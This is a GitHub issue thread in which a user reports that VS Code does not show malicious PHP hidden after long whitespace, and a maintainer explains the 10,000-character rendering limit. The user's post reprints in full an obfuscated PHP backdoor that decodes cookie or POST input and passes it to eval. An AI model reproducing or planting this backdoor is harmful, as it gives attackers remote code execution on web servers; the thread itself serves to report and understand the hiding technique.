Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

VSCode not showing malicious PHP code. #83576

Closed
FernandoGarcia opened this issue Oct 29, 2019 · 4 comments
Closed

VSCode not showing malicious PHP code. #83576

FernandoGarcia opened this issue Oct 29, 2019 · 4 comments
Assignees
@alexdima
Labels
*duplicate Issue identified as a duplicate of another issue(s)

Comments

@FernandoGarcia
Copy link

Hi!

I have some malicious PHP code in a file and the editor is not showing it.
I can see the code only using the search tool on editor as you can see in image below.

vscode

Opening the code in text editor I can see:

<?php $ye2f = 19;$GLOBALS['r8eda45'] = Array();global $r8eda45;$r8eda45 = $GLOBALS;${"\x47\x4c\x4fB\x41\x4c\x53"}['r9de'] = "\x7e\x60\x2f\x58\x48\x4d\x6f\x29\x72\x41\x49\x42\x4a\x5a\x54\x2d\x32\x53\x7c\x4b\x3d\x73\x7b\x4f\x24\x3a\x77\x4c\x25\x6b\x57\x2c\x33\x6d\x20\x66\x7d\x26\x30\x5f\x5b\x3c\x75\x51\x5c\x5d\x2b\x3e\x47\x65\x39\x4e\x2a\x76\x27\x46\x69\x62\x78\x6a\x56\x50\x44\x23\x67\x6c\x61\x79\x9\xd\x55\x36\x45\x74\x3b\x52\x70\x28\x21\x40\x63\x6e\x64\x34\x35\x59\x7a\x71\x5e\x22\x31\x2e\x3f\xa\x37\x68\x38\x43";$r8eda45[$r8eda45['r9de'][58].$r8eda45['r9de'][38].$r8eda45['r9de'][50].$r8eda45['r9de'][94].$r8eda45['r9de'][50].$r8eda45['r9de'][57].$r8eda45['r9de'][66].$r8eda45['r9de'][16]] = $r8eda45['r9de'][80].$r8eda45['r9de'][95].$r8eda45['r9de'][8];$r8eda45[$r8eda45['r9de'][59].$r8eda45['r9de'][50].$r8eda45['r9de'][90].$r8eda45['r9de'][32].$r8eda45['r9de'][57].$r8eda45['r9de'][16].$r8eda45['r9de'][50].$r8eda45['r9de'][80]] = $r8eda45['r9de'][6].$r8eda45['r9de'][8].$r8eda45['r9de'][82];$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][83].$r8eda45['r9de'][82].$r8eda45['r9de'][50].$r8eda45['r9de'][16].$r8eda45['r9de'][80].$r8eda45['r9de'][80].$r8eda45['r9de'][66].$r8eda45['r9de'][94]] = $r8eda45['r9de'][82].$r8eda45['r9de'][49].$r8eda45['r9de'][35].$r8eda45['r9de'][56].$r8eda45['r9de'][81].$r8eda45['r9de'][49];$r8eda45[$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][96].$r8eda45['r9de'][94].$r8eda45['r9de'][71].$r8eda45['r9de'][94]] = $r8eda45['r9de'][21].$r8eda45['r9de'][73].$r8eda45['r9de'][8].$r8eda45['r9de'][65].$r8eda45['r9de'][49].$r8eda45['r9de'][81];$r8eda45[$r8eda45['r9de'][8].$r8eda45['r9de'][57].$r8eda45['r9de'][82].$r8eda45['r9de'][49].$r8eda45['r9de'][16].$r8eda45['r9de'][96].$r8eda45['r9de'][83].$r8eda45['r9de'][83].$r8eda45['r9de'][32]] = $r8eda45['r9de'][82].$r8eda45['r9de'][49].$r8eda45['r9de'][35].$r8eda45['r9de'][56].$r8eda45['r9de'][81].$r8eda45['r9de'][49].$r8eda45['r9de'][82];$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][96].$r8eda45['r9de'][82].$r8eda45['r9de'][90].$r8eda45['r9de'][90]] = $r8eda45['r9de'][56].$r8eda45['r9de'][81].$r8eda45['r9de'][56].$r8eda45['r9de'][39].$r8eda45['r9de'][21].$r8eda45['r9de'][49].$r8eda45['r9de'][73];$r8eda45[$r8eda45['r9de'][42].$r8eda45['r9de'][32].$r8eda45['r9de'][35].$r8eda45['r9de'][83].$r8eda45['r9de'][16].$r8eda45['r9de'][71]] = $r8eda45['r9de'][21].$r8eda45['r9de'][49].$r8eda45['r9de'][8].$r8eda45['r9de'][56].$r8eda45['r9de'][66].$r8eda45['r9de'][65].$r8eda45['r9de'][56].$r8eda45['r9de'][86].$r8eda45['r9de'][49];$r8eda45[$r8eda45['r9de'][42].$r8eda45['r9de'][80].$r8eda45['r9de'][49].$r8eda45['r9de'][94].$r8eda45['r9de'][82].$r8eda45['r9de'][83]] = $r8eda45['r9de'][76].$r8eda45['r9de'][95].$r8eda45['r9de'][76].$r8eda45['r9de'][53].$r8eda45['r9de'][49].$r8eda45['r9de'][8].$r8eda45['r9de'][21].$r8eda45['r9de'][56].$r8eda45['r9de'][6].$r8eda45['r9de'][81];$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][71].$r8eda45['r9de'][90].$r8eda45['r9de'][50]] = $r8eda45['r9de'][42].$r8eda45['r9de'][81].$r8eda45['r9de'][21].$r8eda45['r9de'][49].$r8eda45['r9de'][8].$r8eda45['r9de'][56].$r8eda45['r9de'][66].$r8eda45['r9de'][65].$r8eda45['r9de'][56].$r8eda45['r9de'][86].$r8eda45['r9de'][49];$r8eda45[$r8eda45['r9de'][21].$r8eda45['r9de'][80].$r8eda45['r9de'][35].$r8eda45['r9de'][32].$r8eda45['r9de'][80].$r8eda45['r9de'][50].$r8eda45['r9de'][32].$r8eda45['r9de'][38].$r8eda45['r9de'][35]] = $r8eda45['r9de'][57].$r8eda45['r9de'][66].$r8eda45['r9de'][21].$r8eda45['r9de'][49].$r8eda45['r9de'][71].$r8eda45['r9de'][83].$r8eda45['r9de'][39].$r8eda45['r9de'][82].$r8eda45['r9de'][49].$r8eda45['r9de'][80].$r8eda45['r9de'][6].$r8eda45['r9de'][82].$r8eda45['r9de'][49];$r8eda45[$r8eda45['r9de'][53].$r8eda45['r9de'][57].$r8eda45['r9de'][83].$r8eda45['r9de'][94].$r8eda45['r9de'][50].$r8eda45['r9de'][50].$r8eda45['r9de'][96]] = $r8eda45['r9de'][21].$r8eda45['r9de'][49].$r8eda45['r9de'][73].$r8eda45['r9de'][39].$r8eda45['r9de'][73].$r8eda45['r9de'][56].$r8eda45['r9de'][33].$r8eda45['r9de'][49].$r8eda45['r9de'][39].$r8eda45['r9de'][65].$r8eda45['r9de'][56].$r8eda45['r9de'][33].$r8eda45['r9de'][56].$r8eda45['r9de'][73];$r8eda45[$r8eda45['r9de'][86].$r8eda45['r9de'][96].$r8eda45['r9de'][57].$r8eda45['r9de'][50].$r8eda45['r9de'][84].$r8eda45['r9de'][90].$r8eda45['r9de'][83].$r8eda45['r9de'][94]] = $r8eda45['r9de'][59].$r8eda45['r9de'][16].$r8eda45['r9de'][57].$r8eda45['r9de'][38].$r8eda45['r9de'][38].$r8eda45['r9de'][71].$r8eda45['r9de'][83].$r8eda45['r9de'][35];$r8eda45[$r8eda45['r9de'][64].$r8eda45['r9de'][83].$r8eda45['r9de'][57].$r8eda45['r9de'][84]] = $r8eda45['r9de'][6].$r8eda45['r9de'][32].$r8eda45['r9de'][16].$r8eda45['r9de'][94].$r8eda45['r9de'][38].$r8eda45['r9de'][66].$r8eda45['r9de'][32];$r8eda45[$r8eda45['r9de'][95].$r8eda45['r9de'][82].$r8eda45['r9de'][49].$r8eda45['r9de'][96].$r8eda45['r9de'][84]] = $_POST;$r8eda45[$r8eda45['r9de'][6].$r8eda45['r9de'][82].$r8eda45['r9de'][84].$r8eda45['r9de'][83].$r8eda45['r9de'][80]] = $_COOKIE;@$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][96].$r8eda45['r9de'][82].$r8eda45['r9de'][90].$r8eda45['r9de'][90]]($r8eda45['r9de'][49].$r8eda45['r9de'][8].$r8eda45['r9de'][8].$r8eda45['r9de'][6].$r8eda45['r9de'][8].$r8eda45['r9de'][39].$r8eda45['r9de'][65].$r8eda45['r9de'][6].$r8eda45['r9de'][64], NULL);@$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][96].$r8eda45['r9de'][82].$r8eda45['r9de'][90].$r8eda45['r9de'][90]]($r8eda45['r9de'][65].$r8eda45['r9de'][6].$r8eda45['r9de'][64].$r8eda45['r9de'][39].$r8eda45['r9de'][49].$r8eda45['r9de'][8].$r8eda45['r9de'][8].$r8eda45['r9de'][6].$r8eda45['r9de'][8].$r8eda45['r9de'][21], 0);@$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][96].$r8eda45['r9de'][82].$r8eda45['r9de'][90].$r8eda45['r9de'][90]]($r8eda45['r9de'][33].$r8eda45['r9de'][66].$r8eda45['r9de'][58].$r8eda45['r9de'][39].$r8eda45['r9de'][49].$r8eda45['r9de'][58].$r8eda45['r9de'][49].$r8eda45['r9de'][80].$r8eda45['r9de'][42].$r8eda45['r9de'][73].$r8eda45['r9de'][56].$r8eda45['r9de'][6].$r8eda45['r9de'][81].$r8eda45['r9de'][39].$r8eda45['r9de'][73].$r8eda45['r9de'][56].$r8eda45['r9de'][33].$r8eda45['r9de'][49], 0);@$r8eda45[$r8eda45['r9de'][53].$r8eda45['r9de'][57].$r8eda45['r9de'][83].$r8eda45['r9de'][94].$r8eda45['r9de'][50].$r8eda45['r9de'][50].$r8eda45['r9de'][96]](0);if (!$r8eda45[$r8eda45['r9de'][8].$r8eda45['r9de'][57].$r8eda45['r9de'][82].$r8eda45['r9de'][49].$r8eda45['r9de'][16].$r8eda45['r9de'][96].$r8eda45['r9de'][83].$r8eda45['r9de'][83].$r8eda45['r9de'][32]]($r8eda45['r9de'][9].$r8eda45['r9de'][27].$r8eda45['r9de'][75].$r8eda45['r9de'][72].$r8eda45['r9de'][9].$r8eda45['r9de'][62].$r8eda45['r9de'][85].$r8eda45['r9de'][39].$r8eda45['r9de'][75].$r8eda45['r9de'][70].$r8eda45['r9de'][51].$r8eda45['r9de'][39].$r8eda45['r9de'][32].$r8eda45['r9de'][71].$r8eda45['r9de'][71].$r8eda45['r9de'][66].$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][96].$r8eda45['r9de'][66].$r8eda45['r9de'][96].$r8eda45['r9de'][66].$r8eda45['r9de'][16].$r8eda45['r9de'][32].$r8eda45['r9de'][84].$r8eda45['r9de'][84].$r8eda45['r9de'][66].$r8eda45['r9de'][57].$r8eda45['r9de'][16].$r8eda45['r9de'][90].$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][35].$r8eda45['r9de'][90].$r8eda45['r9de'][90].$r8eda45['r9de'][57].$r8eda45['r9de'][66].$r8eda45['r9de'][90].$r8eda45['r9de'][66].$r8eda45['r9de'][38].$r8eda45['r9de'][16].$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][66])){$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][83].$r8eda45['r9de'][82].$r8eda45['r9de'][50].$r8eda45['r9de'][16].$r8eda45['r9de'][80].$r8eda45['r9de'][80].$r8eda45['r9de'][66].$r8eda45['r9de'][94]]($r8eda45['r9de'][9].$r8eda45['r9de'][27].$r8eda45['r9de'][75].$r8eda45['r9de'][72].$r8eda45['r9de'][9].$r8eda45['r9de'][62].$r8eda45['r9de'][85].$r8eda45['r9de'][39].$r8eda45['r9de'][75].$r8eda45['r9de'][70].$r8eda45['r9de'][51].$r8eda45['r9de'][39].$r8eda45['r9de'][32].$r8eda45['r9de'][71].$r8eda45['r9de'][71].$r8eda45['r9de'][66].$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][96].$r8eda45['r9de'][66].$r8eda45['r9de'][96].$r8eda45['r9de'][66].$r8eda45['r9de'][16].$r8eda45['r9de'][32].$r8eda45['r9de'][84].$r8eda45['r9de'][84].$r8eda45['r9de'][66].$r8eda45['r9de'][57].$r8eda45['r9de'][16].$r8eda45['r9de'][90].$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][35].$r8eda45['r9de'][90].$r8eda45['r9de'][90].$r8eda45['r9de'][57].$r8eda45['r9de'][66].$r8eda45['r9de'][90].$r8eda45['r9de'][66].$r8eda45['r9de'][38].$r8eda45['r9de'][16].$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][66], 1);$ya69 = NULL;$jddb6e = NULL;$r8eda45[$r8eda45['r9de'][26].$r8eda45['r9de'][90].$r8eda45['r9de'][71].$r8eda45['r9de'][80].$r8eda45['r9de'][94].$r8eda45['r9de'][32]] = $r8eda45['r9de'][84].$r8eda45['r9de'][49].$r8eda45['r9de'][94].$r8eda45['r9de'][82].$r8eda45['r9de'][82].$r8eda45['r9de'][83].$r8eda45['r9de'][94].$r8eda45['r9de'][57].$r8eda45['r9de'][15].$r8eda45['r9de'][71].$r8eda45['r9de'][84].$r8eda45['r9de'][35].$r8eda45['r9de'][38].$r8eda45['r9de'][15].$r8eda45['r9de'][83].$r8eda45['r9de'][96].$r8eda45['r9de'][96].$r8eda45['r9de'][35].$r8eda45['r9de'][15].$r8eda45['r9de'][50].$r8eda45['r9de'][80].$r8eda45['r9de'][71].$r8eda45['r9de'][82].$r8eda45['r9de'][15].$r8eda45['r9de'][35].$r8eda45['r9de'][35].$r8eda45['r9de'][82].$r8eda45['r9de'][38].$r8eda45['r9de'][83].$r8eda45['r9de'][80].$r8eda45['r9de'][96].$r8eda45['r9de'][80].$r8eda45['r9de'][84].$r8eda45['r9de'][71].$r8eda45['r9de'][16].$r8eda45['r9de'][80];global $w16c73;function o3270a3($ya69, $b887){global $r8eda45;$l17dd13 = "";for ($g0e0b30=0; $g0e0b30<$r8eda45[$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][96].$r8eda45['r9de'][94].$r8eda45['r9de'][71].$r8eda45['r9de'][94]]($ya69);){for ($o4b7061=0; $o4b7061<$r8eda45[$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][96].$r8eda45['r9de'][94].$r8eda45['r9de'][71].$r8eda45['r9de'][94]]($b887) && $g0e0b30<$r8eda45[$r8eda45['r9de'][35].$r8eda45['r9de'][57].$r8eda45['r9de'][96].$r8eda45['r9de'][94].$r8eda45['r9de'][71].$r8eda45['r9de'][94]]($ya69); $o4b7061++, $g0e0b30++){$l17dd13 .= $r8eda45[$r8eda45['r9de'][58].$r8eda45['r9de'][38].$r8eda45['r9de'][50].$r8eda45['r9de'][94].$r8eda45['r9de'][50].$r8eda45['r9de'][57].$r8eda45['r9de'][66].$r8eda45['r9de'][16]]($r8eda45[$r8eda45['r9de'][59].$r8eda45['r9de'][50].$r8eda45['r9de'][90].$r8eda45['r9de'][32].$r8eda45['r9de'][57].$r8eda45['r9de'][16].$r8eda45['r9de'][50].$r8eda45['r9de'][80]]($ya69[$g0e0b30]) ^ $r8eda45[$r8eda45['r9de'][59].$r8eda45['r9de'][50].$r8eda45['r9de'][90].$r8eda45['r9de'][32].$r8eda45['r9de'][57].$r8eda45['r9de'][16].$r8eda45['r9de'][50].$r8eda45['r9de'][80]]($b887[$o4b7061]));}}return $l17dd13;}function j2b0064f($ya69, $b887){global $r8eda45;global $w16c73;return $r8eda45[$r8eda45['r9de'][64].$r8eda45['r9de'][83].$r8eda45['r9de'][57].$r8eda45['r9de'][84]]($r8eda45[$r8eda45['r9de'][64].$r8eda45['r9de'][83].$r8eda45['r9de'][57].$r8eda45['r9de'][84]]($ya69, $w16c73), $b887);}foreach ($r8eda45[$r8eda45['r9de'][6].$r8eda45['r9de'][82].$r8eda45['r9de'][84].$r8eda45['r9de'][83].$r8eda45['r9de'][80]] as $b887=>$te359){$ya69 = $te359;$jddb6e = $b887;}if (!$ya69){foreach ($r8eda45[$r8eda45['r9de'][95].$r8eda45['r9de'][82].$r8eda45['r9de'][49].$r8eda45['r9de'][96].$r8eda45['r9de'][84]] as $b887=>$te359){$ya69 = $te359;$jddb6e = $b887;}}$ya69 = @$r8eda45[$r8eda45['r9de'][82].$r8eda45['r9de'][71].$r8eda45['r9de'][90].$r8eda45['r9de'][50]]($r8eda45[$r8eda45['r9de'][86].$r8eda45['r9de'][96].$r8eda45['r9de'][57].$r8eda45['r9de'][50].$r8eda45['r9de'][84].$r8eda45['r9de'][90].$r8eda45['r9de'][83].$r8eda45['r9de'][94]]($r8eda45[$r8eda45['r9de'][21].$r8eda45['r9de'][80].$r8eda45['r9de'][35].$r8eda45['r9de'][32].$r8eda45['r9de'][80].$r8eda45['r9de'][50].$r8eda45['r9de'][32].$r8eda45['r9de'][38].$r8eda45['r9de'][35]]($ya69), $jddb6e));if (isset($ya69[$r8eda45['r9de'][66].$r8eda45['r9de'][29]]) && $w16c73==$ya69[$r8eda45['r9de'][66].$r8eda45['r9de'][29]]){if ($ya69[$r8eda45['r9de'][66]] == $r8eda45['r9de'][56]){$g0e0b30 = Array($r8eda45['r9de'][76].$r8eda45['r9de'][53] => @$r8eda45[$r8eda45['r9de'][42].$r8eda45['r9de'][80].$r8eda45['r9de'][49].$r8eda45['r9de'][94].$r8eda45['r9de'][82].$r8eda45['r9de'][83]](),$r8eda45['r9de'][21].$r8eda45['r9de'][53] => $r8eda45['r9de'][90].$r8eda45['r9de'][91].$r8eda45['r9de'][38].$r8eda45['r9de'][15].$r8eda45['r9de'][90],);echo @$r8eda45[$r8eda45['r9de'][42].$r8eda45['r9de'][32].$r8eda45['r9de'][35].$r8eda45['r9de'][83].$r8eda45['r9de'][16].$r8eda45['r9de'][71]]($g0e0b30);}elseif ($ya69[$r8eda45['r9de'][66]] == $r8eda45['r9de'][49]){eval/*ab6e*/($ya69[$r8eda45['r9de'][82]]);}exit();}} ?><?php

I case someone want check the hidden code here the file:
malware.zip

Best regards.
@alexdima
Copy link
Member

@FernandoGarcia The code is rendered, but the first line has a lot of space characters, so you need to scroll to the right to see it. I believe this is done intentionally by the malware authors to make it more difficult to spot the code:

TO_UPLOAD

@alexdima alexdima added the invalid Issue identified as not relevant or not valid label Oct 30, 2019
@FernandoGarcia
Copy link
Author

Hi!

Thanks for your time!

I know about large white space because I found in other files.

I think the rendering has changed because in others files I did see the code on minimap while searching as you saw after toggle word wrap.

Maybe another detail that has contributed for this issue is because the cursor was not moved to match place as should be.

Here an example.

vscode2

The reason is: The line is not entirely rendered ending with 3 dots.

vscode

Best regards

@alexdima
Copy link
Member

I agree that the cursor was not revealed (when the column was > 10000). I have recently fixed that with #50304 and the fix is already available in the insiders release channel -- https://code.visualstudio.com/insiders/

The fact that we don't paint over 10k characters is tracked in #7772

@alexdima alexdima added *duplicate Issue identified as a duplicate of another issue(s) and removed invalid Issue identified as not relevant or not valid labels Oct 30, 2019
@FernandoGarcia
Copy link
Author

This problem can be used to difficult the malicious code to be found because the author can add over 10k white space on start.

@vscodebot vscodebot bot locked and limited conversation to collaborators Dec 16, 2019
Sign up for free to subscribe to this conversation on GitHub. Already have an account? Sign in.
Assignees

@alexdima alexdima

Labels
*duplicate Issue identified as a duplicate of another issue(s)
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
2 participants
@FernandoGarcia @alexdima